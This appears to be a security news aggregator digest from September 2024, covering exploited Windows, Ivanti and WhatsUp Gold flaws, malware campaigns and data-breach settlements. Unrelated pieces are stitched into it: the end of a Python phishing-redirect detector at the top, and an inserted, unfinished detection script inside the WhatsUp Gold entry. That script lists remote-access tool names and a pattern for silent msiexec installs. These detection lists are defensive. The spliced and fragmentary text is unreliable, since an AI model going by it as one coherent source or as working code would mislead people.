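def analyse(raw: bytes, request_host: str) -> Optional[dict]:
    """Return a verdict for the Refresh header, or None when the response carries none."""
    refresh = parse_headers(raw).get("refresh")
    if refresh is None:
        return None
    m = REFRESH_RE.match(refresh)
    if m is None:
        return None
    delay, target = int(m.group(1)), m.group(2)
    parts = urlsplit(target)
    reasons = []
    if parts.netloc and (parts.hostname or "").lower() != request_host.lower():
        reasons.append("off-origin redirect")
    if delay == 0:
        reasons.append("zero delay")
    email = EMAIL_RE.search(unquote(target))     # catches %40-encoded addresses too
    if email:
        reasons.append("recipient address embedded")
    return {
        "delay": delay,
        "target": target,
        "prefilled_email": email.group(0) if email else None,
        "reasons": reasons,
        "suspicious": "off-origin redirect" in reasons and len(reasons) >= 2,
    }


if __name__ == "__main__":
    for name, raw in (("malicious", MALICIOUS), ("benign", BENIGN), ("plain", PLAIN)):
        print(name, analyse(raw, "cdn.example.org"))
```

In a proxy or mail-link sandbox this runs on the first response of the click, before any HTML is rendered; a same-origin delayed refresh (a status page reloading itself) stays clean, while an immediate hop to another host with the recipient's address in tow is the pattern described above.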


        23andMe to pay $30 million in settlement over 2023 data breach

        financial
        2024-09-16 https://www.malwarebytes.com/blog/news/2024/09/23andme-to-pay-30-million-in-settlement-over-2023-data-breach
        Genetic testing company 23andMe will pay $30 million over a 2023 data breach which ended in millions of customers having data exposed. "

        Autosummary: Genetic testing company 23andMe will pay $30 million to settle a class action lawsuit over a 2023 data breach which ended in some customers having information like names, birth years, and ancestry information exposed. "


        Microsoft confirms second 0-day exploited by Void Banshee APT (CVE-2024-43461)

        exploits
        2024-09-16 https://www.helpnetsecurity.com/2024/09/16/cve-2024-43461-exploited/

CVE-2024-43461, a spoofing vulnerability affecting Windows MSHTML – a software component used by various apps for rendering web pages on Windows – “was exploited as a part of an attack chain relating to CVE-2024-38112, prior to July 2024,” Microsoft has revealed. The latter vulnerability was patched by the company in July 2024, and threat hunters with Trend Micro’s Zero Day Initiative explained that it had been used by the Void Banshee APT group to … More

        The post Microsoft confirms second 0-day exploited by Void Banshee APT (CVE-2024-43461) appeared first on Help Net Security.

        "

        Autosummary: "


        North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware

        exploits
        2024-09-16 https://thehackernews.com/2024/09/north-korean-hackers-target.html
Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor. The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by someone claiming to be a recruiter for a legitimate decentralized "

        Autosummary: These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory. "


        Recently patched Windows flaw CVE-2024-43461 was actively exploited as a zero-day before July 2024

        exploits
        2024-09-16 https://securityaffairs.com/168467/hacking/windows-cve-2024-43461-actively-exploited-before-july-2024.html
        Microsoft warns that a recently patched Windows flaw, tracked as CVE-2024-43461, was actively exploited as a zero-day before July 2024. Microsoft warns that attackers actively exploited the Windows vulnerability CVE-2024-43461 as a zero-day before July 2024. The vulnerability CVE-2024-43461 is a Windows MSHTML platform spoofing issue. MSHTML is a platform used by Internet Explorer. Although […] "

Autosummary: Pierluigi Paganini, September 16, 2024. Microsoft warns that a recently patched Windows flaw, tracked as CVE-2024-43461, was actively exploited as a zero-day before July 2024. “This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.” "


        CISA warns of Windows flaw used in infostealer malware attacks

        exploits
        2024-09-16 https://www.bleepingcomputer.com/news/security/cisa-warns-of-windows-flaw-used-in-infostealer-malware-attacks/
        CISA has ordered U.S. federal agencies to secure their systems against a recently patched Windows MSHTML spoofing zero-day bug exploited by the Void Banshee APT hacking group. [...]

        Autosummary: Federal agencies given three weeks to patch: Today, CISA has added the MSHTML spoofing vulnerability to its Known Exploited Vulnerabilities catalog, tagging it as actively exploited and ordering federal agencies to secure vulnerable systems within three weeks by October 7, as mandated by Binding Operational Directive (BOD) 22-01.


        Exploit code released for critical Ivanti RCE flaw, patch now

        exploits
        2024-09-16 https://www.bleepingcomputer.com/news/security/exploit-code-released-for-critical-ivanti-rce-flaw-patch-now/
        A proof-of-concept (PoC) exploit for CVE-2024-29847, a critical remote code execution (RCE) vulnerability in Ivanti Endpoint Manager, is now publicly released, making it crucial to update devices. [...]



        Microsoft fixes bug crashing Microsoft 365 apps when typing

        exploits
        2024-09-16 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-crashing-microsoft-365-apps-when-typing/
        Microsoft has fixed a known issue that causes Microsoft 365 apps like Outlook, Word, Excel, and OneNote to crash while typing or spell-checking a text. [...]



        Week in review: Veeam Backup & Replication RCE could soon be exploited, Microsoft fixes 4 0-days

        exploits
        2024-09-15 https://www.helpnetsecurity.com/2024/09/15/week-in-review-veeam-backup-replication-rce-could-soon-be-exploited-microsoft-fixes-4-0-days/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711) CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data. Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, … More


        Autosummary: Microsoft fixes 4 exploited zero-days and a code defect that nixed earlier security fixes: September 2024 Patch Tuesday is here and Microsoft has delivered 79 fixes, including those for a handful of zero-days (CVE-2024-38217, CVE-2024-38226, CVE-2024-38014, CVE-2024-43461) exploited by attackers in the wild, and a Windows 10 code defect (CVE-2024-43491) that rolled back earlier CVE fixes. New infosec products of the week, September 13, 2024: Here’s a look at the most interesting products from the past week, featuring releases from Druva, Huntress, Ketch, LOKKER, Tenable, Trellix, and Wing Security.


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 11

        exploits
        2024-09-15 https://securityaffairs.com/168406/malware/security-affairs-malware-newsletter-round-11.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Mythical Beasts and Where to Find Them: Mapping the Global Spyware Market and its Threats to National Security and Human Rights; Dissecting Lumma Malware: Analyzing the Fake CAPTCHA and Obfuscation Techniques – Part 2; Predator Spyware […]



        Port of Seattle confirmed that Rhysida ransomware gang was behind the August attack

        exploits ransomware
        2024-09-15 https://securityaffairs.com/168412/cyber-crime/port-of-seattle-rhysida-ransomware.html
        Port of Seattle confirmed on Friday that the Rhysida ransomware group was behind the cyberattack that hit the agency in August. In August, a cyber attack hit the Port of Seattle, which also operates the Seattle-Tacoma International Airport; websites and phone systems were impacted. Media reported that the Port of Seattle, which also operates the […]

        Autosummary: The Port confirmed that an unauthorized actor accessed and encrypted parts of their computer systems, disrupting key services like baggage handling, check-in kiosks, ticketing, Wi-Fi, and parking. The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors.


        Windows vulnerability abused braille “spaces” in zero-day attacks

        exploits
        2024-09-15 https://www.bleepingcomputer.com/news/security/windows-vulnerability-abused-braille-spaces-in-zero-day-attacks/
        A recently fixed "Windows MSHTML spoofing vulnerability" tracked under CVE-2024-43461 is now marked as previously exploited after it was used in attacks by the Void Banshee APT hacking group. [...]

        Autosummary: The CVE-2024-43461 zero-day: In July, Check Point Research and Trend Micro both reported on the same attacks that exploited Windows zero-days to infect devices with the Atlantida info-stealer, used to steal passwords, authentication cookies, and cryptocurrency wallets from infected devices.


        Mexico"s Alvarez "best in the world" after beating Berlanga

        latam
        2024-09-15 https://www.bbc.com/sport/boxing/articles/c4gdl1yd27yo
        Saul "Canelo" Alvarez remains the unified super-middleweight world champion after earning a unanimous decision over Edgar Berlanga on Saturday.

        Autosummary: The 34-year-old's record improved to 62-2-2 while 27-year-old Berlanga, born in New York and of Puerto Rican heritage, is now 22-1.


        Ivanti Warns of Active Exploitation of Newly Patched Cloud Appliance Vulnerability

        exploits
        2024-09-14 https://thehackernews.com/2024/09/ivanti-warns-of-active-exploitation-of.html
        Ivanti has revealed that a newly patched security flaw in its Cloud Service Appliance (CSA) has come under active exploitation in the wild. The high-severity vulnerability in question is CVE-2024-8190 (CVSS score: 7.2), which allows remote code execution under certain circumstances. "An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows



        Ivanti Cloud Service Appliance flaw is being actively exploited in the wild

        exploits
        2024-09-14 https://securityaffairs.com/168388/hacking/ivanti-csa-cve-2024-8190.html
        Ivanti warned that recently patched flaw CVE-2024-8190 in Cloud Service Appliance (CSA) is being actively exploited in the wild. Ivanti warned that a newly patched vulnerability, tracked as CVE-2024-8190 (CVSS score of 7.2), in its Cloud Service Appliance (CSA) is being actively exploited. “Following public disclosure, Ivanti has confirmed exploitation of this vulnerability in the […]

        Autosummary: Pierluigi Paganini, September 14, 2024. Ivanti warned that recently patched flaw CVE-2024-8190 in Cloud Service Appliance (CSA) is being actively exploited in the wild.


        U.S. CISA adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-14 https://securityaffairs.com/168398/hacking/u-s-cisa-adds-ivanti-csa-vulnerability-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti Cloud Services Appliance OS Command Injection Vulnerability CVE-2024-8190 (CVSS score of 7.2) to its Known Exploited Vulnerabilities (KEV) catalog. This week, Ivanti warned that recently patched flaw […]

        Autosummary: Pierluigi Paganini, September 14, 2024. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti Cloud Services Appliance Vulnerability to its Known Exploited Vulnerabilities catalog.


        Malware locks browser in kiosk mode to steal Google credentials

        exploits
        2024-09-14 https://www.bleepingcomputer.com/news/security/malware-locks-browser-in-kiosk-mode-to-steal-google-credentials/
        A malware campaign uses the unusual method of locking users in their browser's kiosk mode to annoy them into entering their Google credentials, which are then stolen by information-stealing malware. [...]

        Autosummary: Kiosk mode theft: According to OALABS researchers who uncovered this peculiar attack method, it has been used in the wild since at least August 22, 2024, mainly by Amadey, a malware loader, info-stealer, and system reconnaissance tool first deployed by hackers in 2018.


        New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency

        exploits Linux
        2024-09-13 https://thehackernews.com/2024/09/new-linux-malware-campaign-exploits.html
        Cybersecurity researchers have uncovered a new malware campaign targeting Linux environments to conduct illicit cryptocurrency mining. The activity, which specifically singles out the Oracle Weblogic server, is designed to deliver malware dubbed Hadooken, according to cloud security firm Aqua. "When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," security researcher



        Thousands gather as Peru's late leader lies in state

        latam government
        2024-09-13 https://www.bbc.com/news/articles/cx2l2g3jjmxo
        Alberto Fujimori, who ruled Peru with an iron fist during the 1990s, died aged 86 on Wednesday.



        Rain Technology protects consumers against visual hackers and snoopers at ATM terminals

        financial
        2024-09-13 https://www.helpnetsecurity.com/2024/09/13/rain-technology-atm-switchable-privacy/

        Rain Technology announced ATM Switchable Privacy, designed to protect consumers against visual hackers and snoopers at ATM terminals in financial institutions, retail stores, restaurants, airports, and other public settings. ATM stats and state of the market: With more than three million ATMs around the world and a global ATM market size estimated to reach $28 billion by 2026, ATMs within retail and banking settings represent a significant risk point for merchants, retailers and banks as … More


        Autosummary: “Businesses can foster trust and loyalty, improve the customer journey, protect physical safety, mitigate the risk of data breaches, and ensure regulatory compliance — a winning proposition that promotes a more secure, transparent and mutually beneficial relationship between businesses and their customers.”


        Vo1d malware infected 1.3 Million Android-based TV Boxes in 197 countries

        exploits
        2024-09-13 https://securityaffairs.com/168342/malware/vo1d-android-malware-tv-boxes.html
        Researchers uncovered an Android malware, dubbed Vo1d, that has already infected nearly 1.3 million Android devices in 197 countries. Doctor Web researchers uncovered a malware, tracked as Vo1d, that infected nearly 1.3 million Android-based TV boxes belonging to users in 197 countries. The malicious code acts as a backdoor and allows attackers to download and install […]

        Autosummary: The largest number of infections was reported in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.


        RansomHub claims Kawasaki cyberattack, threatens to leak stolen data

        ciber
        2024-09-13 https://www.bleepingcomputer.com/news/security/ransomhub-claims-kawasaki-cyberattack-threatens-to-leak-stolen-data/
        Kawasaki Motors Europe has announced that it's recovering from a cyberattack that caused service disruptions, as the RansomHub ransomware gang threatens to leak stolen data. [...]

        Autosummary: With the influx of skilled affiliates, RansomHub has seen a surge in successful attacks, including those against a division of Rite Aid, Frontier, Planned Parenthood, Halliburton, and Christie's. Last month, a joint advisory between the FBI, CISA, and the Department of Health and Human Services (HHS) reported that RansomHub breached 210 victims from a wide range of critical U.S. infrastructure sectors since it launched in February.


        23andMe to pay $30 million in genetics data breach settlement

        financial industry
        2024-09-13 https://www.bleepingcomputer.com/news/security/23andme-to-pay-30-million-in-genetics-data-breach-settlement/
        DNA testing giant 23andMe has agreed to pay $30 million to settle a lawsuit over a data breach that exposed the personal information of 6.4 million customers in 2023. [...]

        Autosummary: "23andMe denies the claims and allegations set forth in the Complaint, denies that it failed to properly protect the Personal Information of its consumers and users, and further denies the viability of Settlement Class Representatives’ claims for statutory damages," the company said in the filed preliminary settlement.


        Ivanti warns high severity CSA flaw is now exploited in attacks

        exploits
        2024-09-13 https://www.bleepingcomputer.com/news/security/ivanti-warns-high-severity-csa-flaw-is-now-exploited-in-attacks/
        Ivanti confirmed on Friday that a high severity vulnerability in its Cloud Services Appliance (CSA) solution is now actively exploited in attacks. [...]

        Autosummary: On the same day, it also patched almost two dozen other high and critical severity flaws in Ivanti EPM, Workspace Control (IWC), and Cloud Service Appliance (CSA).


        New Linux malware Hadooken targets Oracle WebLogic servers

        exploits Linux
        2024-09-13 https://www.bleepingcomputer.com/news/security/new-linux-malware-hadooken-targets-oracle-weblogic-servers/
        Hackers are targeting Oracle WebLogic servers to infect them with a new Linux malware named "Hadooken," which launches a cryptominer and a tool for distributed denial-of-service (DDoS) attacks. [...]

        Autosummary: Hadooken hitting hard: Once the attackers breach an environment and get sufficient privileges, they download a shell script named "c" and a Python script named "y." The two scripts both drop Hadooken, but the shell code also tries to look for SSH data in various directories and uses the info to attack known servers, the researchers say.


        Apple Vision Pro Vulnerability Exposed Virtual Keyboard Inputs to Attackers

        exploits
        2024-09-13 https://thehackernews.com/2024/09/apple-vision-pro-vulnerability-exposed.html
        Details have emerged about a now-patched security flaw impacting Apple's Vision Pro mixed reality headset that, if successfully exploited, could allow malicious attackers to infer data entered on the device's virtual keyboard. The attack, dubbed GAZEploit, has been assigned the CVE identifier CVE-2024-40865. "A novel attack that can infer eye-related biometrics from the avatar image to



        Say Goodbye to Phishing: Must-Haves to Eliminate Credential Theft

        financial
        2024-09-13 https://thehackernews.com/2024/09/say-goodbye-to-phishing-must-haves-to.html
        Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible. However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to

        Autosummary: Our passwordless, phishing-resistant MFA allows users to log in with a touch or glance and supports the broadest range of operating systems on the market, including Windows, Android, macOS, iOS, Linux, and ChromeOS, so users can log in seamlessly no matter what device they prefer to use. The second benefit is that, as an application that lives on the device, it can provide real-time risk data about the device, such as firewall enabled, biometric-enabled, disk encryption enabled, and more.


        TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud

        financial exploits
        2024-09-13 https://thehackernews.com/2024/09/trickmo-android-trojan-exploits.html
        Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials. "The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition,

        Autosummary: Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android's accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device.


        Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw

        exploits
        2024-09-13 https://thehackernews.com/2024/09/progress-whatsup-gold-exploited-just.html
        Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who



        New Linux malware called Hadooken targets Oracle WebLogic servers

        exploits Linux
        2024-09-13 https://securityaffairs.com/168364/malware/hadooken-targets-oracle-weblogic-servers.html
        A new Linux malware called Hadooken targets Oracle WebLogic servers; it has been linked to several ransomware families. Aqua Security Nautilus researchers discovered a new Linux malware, called Hadooken, targeting Weblogic servers. The name comes from the attack “surge fist” in the Street Fighter series. Upon execution, the malware drops a Tsunami malware and deploys […]

        Autosummary: Pierluigi Paganini, September 13, 2024. A new Linux malware called Hadooken targets Oracle WebLogic servers; it has been linked to several ransomware families.


        Lehigh Valley Health Network hospital network has agreed to a $65 million settlement after data breach

        financial
        2024-09-13 https://securityaffairs.com/168356/data-breach/lehigh-valley-health-network-settlement-data-breach.html
        Lehigh Valley Health Network’s (LVHN) hospital network has agreed to a $65 million settlement in a class action lawsuit related to a data breach. Lehigh Valley Health Network (LVHN) is a large hospital and healthcare system based in Pennsylvania, USA. It operates numerous hospitals, health centers, and outpatient facilities across the region, including the […]

        Autosummary: In a data breach notification published on its website, the company reported that affected information varied by individual but potentially included some combination of the following data elements: names, addresses, phone numbers, medical record number, treatment and diagnosis information, including Current Procedural Terminology (CPT) codes, and health insurance information.


        Port of Seattle hit by Rhysida ransomware in August attack

        exploits ransomware
        2024-09-13 https://www.bleepingcomputer.com/news/security/port-of-seattle-says-rhysida-ransomware-was-behind-august-attack/
        Port of Seattle, the United States government agency overseeing Seattle's seaport and airport, confirmed on Friday that the Rhysida ransomware operation was behind a cyberattack impacting its systems over the last three weeks. [...]

        Autosummary: The Port's decision to take systems offline and the ransomware gang encrypting those that weren't isolated in time caused outages impacting multiple services and systems, including baggage, check-in kiosks, ticketing, Wi-Fi, passenger display boards, the Port of Seattle website, the flySEA app, and reserved parking.


        Internal disconnects vs. cybersecurity: How connectivity shapes challenges

        ciber
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/organizations-technology-connectivity-advantages/

        Concerns about the trustworthiness of internal data exist in nearly all organizations globally, according to TeamViewer. 99% of business leaders pointed to factors undermining trust in internal data, citing multiple versions of the truth (38%), conflicting data management practices (32%) and too many instances of poor hardware reliability (31%) as top reasons for mistrust. Organizations face technology connectivity gaps: Interestingly, this mistrust of internal data varies across company size. It is more likely to be … More


        Autosummary: When asked how seamless technology connectivity could help their organization, 80% of respondents state it allows for better customer interactions and increases customer satisfaction; 81% say it enables better innovation; 82% believe it allows more time for considered decision making; and 86% consider it an important aspect of working at their company, increasing talent retention. The research also uncovered a correlation between excellent connectivity and industry leadership, with 33% of business leaders at organizations with excellent technology connectivity saying their financial performance is among the leaders in their industry.


        Former Peruvian leader Alberto Fujimori dies at 86

        latam
        2024-09-12 https://www.bbc.com/news/articles/cy0r0rgrewlo
        The ex-president, who was convicted of human rights abuses and corruption, died "after a long battle with cancer".

        Autosummary: "After a long battle with cancer, our father, Alberto Fujimori, has just departed to meet the Lord," his children Keiko, Hiro, Sachie and Kenji said in a joint statement.


        Top priorities for federal cybersecurity: Infrastructure, zero trust, and AI-driven defense

        ciber
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/erica-banks-booz-allen-hamilton-federal-cybersecurity/

        In this Help Net Security interview, Erica Banks, VP and a leader in Booz Allen’s civilian services business, discusses the Federal Cybersecurity Strategy’s role in safeguarding national assets. Banks outlines key areas for improvement, including funding, talent retention, and leveraging AI for enhanced cyber defense. The Federal Cybersecurity Strategy is a crucial part of protecting national assets. How effective do you think the current strategy is in mitigating cyber threats, and what areas need more attention … More


        Autosummary: Given the diverse range of missions these federal agencies support, it is essential that they are protected against disruptive cyber threats, and zero trust principles – assume a breach; never trust, always verify; allow only least-privileged access – can provide protection in real time. With the National Cyber Strategy Implementation Plan pushing for a more aggressive approach to cyber preparedness and constant attacks increasing the pressure for accountability, companies and the U.S. government need to be strategically allocating roles, responsibilities, and resources to outpace evolving threats.


        Benefits and best practices of leveraging AI for cybersecurity

        ciber
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/benefits-best-practices-ai-cybersecurity-video/

        AI has become a key player in protecting valuable organizational insights from threats. Thanks to AI-enabled data protection practices such as behavior monitoring, enterprises no longer have to be reactive to a cyberattack but can be proactive before a potential threat arises. In this Help Net Security video, Andrew Riddell, Principal Cybersecurity Architect, Logicalis US, explains the benefits and best practices of leveraging AI for cybersecurity.



        Peruvian strongman Alberto Fujimori's death leaves divisive legacy

        latam
        2024-09-12 https://www.bbc.com/news/articles/c0jjn77z2xyo
        The former Peruvian president was a controversial figure, who was jailed for human rights abuses.

        Autosummary: Re-elected for a third term amid allegations of ballot rigging. 2000: Flees to Japan after Montesinos scandal breaks. 2005: Detained in Chile at the Peruvian authorities' request. 2007: Extradited from Chile to face trial in Peru. 2007: Jailed for six years for abuse of power. 2009: Convicted of human rights abuses, jailed for 25 years. 2017: Alberto Fujimori was imprisoned for human rights abuses in 2009; however, he said the charges were politically motivated. Though this shock therapy brought great hardship for ordinary Peruvians, it ended rampant hyperinflation and paved the way for sustained economic growth in the second half of the 1990s.


        Losses due to cryptocurrency and BEC scams are soaring

        financial
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/losses-due-to-cryptocurrency-and-bec-scams-are-soaring/

        Every type of fraud is on the rise, and 2023 was a particularly devastating year for victims of cryptocurrency and business email compromise (BEC) scams, according to the FBI. Cryptocurrency fraud: Based on complaints filed to FBI’s Internet Crime Complaint Center (IC3) in 2023, the year saw over $5.6 billion in losses tied to cryptocurrency fraud alone, marking a dramatic 45% increase over 2022 figures. Criminals are exploiting the difficulties of tracing and recovering cryptocurrency … More


        Autosummary: While these transfers can be reversed by banks if the victim acts quickly, and there are mechanisms for recovering large international wire transfers stolen from US victim bank accounts (e.g., the Financial Fraud Kill Chain, INTERPOL’s Global Rapid Intervention of Payments) and law enforcement teams that can help (e.g., FBI’s Recovery Asset Team), there was a 9% increase in identified global exposed losses between December 2022 and December 2023, according to the FBI.


        GitLab warns of critical pipeline execution vulnerability

        exploits
        2024-09-12 https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-pipeline-execution-vulnerability/
        GitLab has released critical updates to address multiple vulnerabilities, the most severe of them (CVE-2024-6678) allowing an attacker to trigger pipelines as arbitrary users under certain conditions. [...]

        Autosummary: GitLab addressed arbitrary pipeline execution vulnerabilities multiple times in recent months, including in July 2024, to fix CVE-2024-6385, in June 2024, to fix CVE-2024-5655, and in September 2023 to patch CVE-2023-5009, all rated critical. The release is for versions 17.3.2, 17.2.5, and 17.1.7 for both GitLab Community Edition (CE) and Enterprise Edition (EE), and patches a total of 18 security issues as part of the bi-monthly (scheduled) security updates.


        PartnerLeak scam site promises victims full access to “cheating” partner’s stolen data

        financial
        2024-09-12 https://www.malwarebytes.com/blog/news/2024/09/partnerleak-scam-site-promises-victims-full-access-to-cheating-partners-stolen-data
        We dug into PartnerLeak, the site behind the "your partner is cheating on you" emails, including how and where the scammers get their information.

        Autosummary: Here’s how it works: Data Backup Access: You can download a backup from iCloud or Google, which includes: device location tracking; movement history with timestamps; correspondence from popular messaging apps like Telegram, WhatsApp, and iMessage; photo and video materials stored on the smartphone. Social Media Analysis: Utilizing AI and extensive data, our service can: check user registration and analyze behavior on platforms like Facebook and Twitter; investigate activity on popular dating apps such as Tinder, AdultFriendFinder, Hinge, and OkCupid. But since many victims, including our co-worker, used The Knot’s services, we contacted them and received this statement from a spokesperson: “We were notified of user concerns, and after investigation by our cybersecurity team, determined there is no evidence of unauthorized access to our systems.” (We have all [his/her] address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all [his/her] contacts) and are willing to give you a full access to this data.


        Suspect arrested over the Transport for London cyberattack

        ciber
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/suspect-arrested-tfl-cyberattack/

        The UK National Crime Agency has arrested and detained a suspect – a 17-year-old male in Walsall (West Midlands) – on suspicion of Computer Misuse Act offences in relation to the Transport for London (TfL) cyberattack, the agency has announced today. Also today, TfL has provided some insight into what their investigation has discovered, namely, that the attack was first noticed on September 1 (Sunday), and that some customer data has been accessed – though … More



        NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics

        industry
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/netscout-cyber-intelligence-platform/

        NETSCOUT announced updates to its advanced, scalable deep packet inspection-based Omnis Cyber Intelligence Network Detection and Response (NDR) platform. New MITRE ATT&CK behavioral analytics enable earlier detection of advanced threats like ransomware, suspicious traffic, or unauthorized access attempts while improving remediation to help meet industry and country compliance requirements. “Digital resilience allows enterprises to continuously operate and quickly leverage digital opportunities to serve their customers, especially during economically challenging times,” stated Fernando Montenegro, senior principal … More

        The post NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics appeared first on Help Net Security.

        "

        Autosummary: “NETSCOUT helps its customers strengthen their digital resilience by enabling easier detection, faster response, and more effective recovery from cyber threats,” stated Jerry Mancini, senior director, office of the CTO, NETSCOUT. "


        Adobe completes fix for Reader bug with known PoC exploit (CVE-2024-41869)

        exploits
        2024-09-12 https://www.helpnetsecurity.com/2024/09/12/cve-2024-41869/

        Among the security updates released by Adobe on Tuesday are those for various versions of Adobe Acrobat and Reader, which fix two critical flaws that could lead to arbitrary code execution: CVE-2024-45112 and CVE-2024-41869. Nothing in the advisory points to a need for users to implement the updates quickly, but the fix for CVE-2024-41869 is actually an additional, more complete fix for CVE-2024-39383, which was supposedly addressed with a security update released in August 2024. … More

        The post Adobe completes fix for Reader bug with known PoC exploit (CVE-2024-41869) appeared first on Help Net Security.

        "

        Autosummary: "


        Beware: New Vo1d Malware Infects 1.3 Million Android TV Boxes Worldwide

        exploits
        2024-09-12 https://thehackernews.com/2024/09/beware-new-vo1d-malware-infects-13.html
        Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void). "It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus "

        Autosummary: "


        Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack

        exploits government
        2024-09-12 https://thehackernews.com/2024/09/iranian-cyber-group-oilrig-targets.html
        Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig. The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis. OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug, "

        Autosummary: Active since at least 2014, the group has a track record of conducting phishing attacks in the Middle East to deliver a variety of custom backdoors such as Karkoff, Shark, Marlin, Saitama, MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah for information theft. "


        Denmark returns iconic indigenous cloak to Brazil

        latam
        2024-09-12 https://www.bbc.com/news/articles/ce818y325d2o
        The cloak, made of 4,000 red feathers, was taken from Brazil during the Portuguese colonial period. "

        Autosummary: "


        Mexico's Alvarez rules out complacency against Berlanga

        latam
        2024-09-12 https://www.bbc.com/sport/boxing/articles/c5y5yrjggxpo
        Saul "Canelo" Alvarez wants to show everybody he is still the best when he faces Edgar Berlanga in Las Vegas on Saturday. "

        Autosummary: "


        Fortinet confirms data breach after hacker claims to steal 440GB of files

        financial
        2024-09-12 https://www.bleepingcomputer.com/news/security/fortinet-confirms-data-breach-after-hacker-claims-to-steal-440gb-of-files/
        Cybersecurity giant Fortinet has confirmed it suffered a data breach after a threat actor claimed to steal 440GB of files from the company's Microsoft Sharepoint server. [...] "

        Autosummary: "


        Hackers targeting WhatsUp Gold with public exploit since August

        exploits
        2024-09-12 https://www.bleepingcomputer.com/news/security/hackers-targeting-whatsup-gold-with-public-exploit-since-august/
        Hackers have been leveraging publicly available exploit code for two critical vulnerabilities in the WhatsUp Gold network availability and performance monitoring solution from Progress Software. [...] "

        Autosummary: Malicious PowerShell script deployed by the attackers Source: Trend Micro Next, the attackers use the legitimate Windows utility ‘msiexec.exe’ to install various remote access tools (RATs) through MSI packages, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote. "
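        The WhatsUp Gold intrusion chain above ends with a PowerShell stage handing off to msiexec.exe to silently install commodity remote-access tools. The following is an added detection example (not code from Trend Micro or from the article) that scores msiexec.exe process-creation events on exactly those traits: a package whose name matches one of the RATs named above, a scripting-host parent, silent-install switches, and a staging directory. The field names (Image, CommandLine, ParentImage) follow the Sysmon Event ID 1 schema; the sample events are constructed for the demo and are not real telemetry.

```python
import re
from dataclasses import dataclass, field

# Remote-access tools the article says were installed via MSI packages.
# Matching is on the package file name, which an attacker can of course rename.
RAT_PACKAGE_NAMES = ("atera", "radmin", "simplehelp", "splashtop")
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MSI_ARG = re.compile(r'/(?:i|package)\s+(?:"([^"]+\.msi)"|(\S+\.msi))', re.IGNORECASE)
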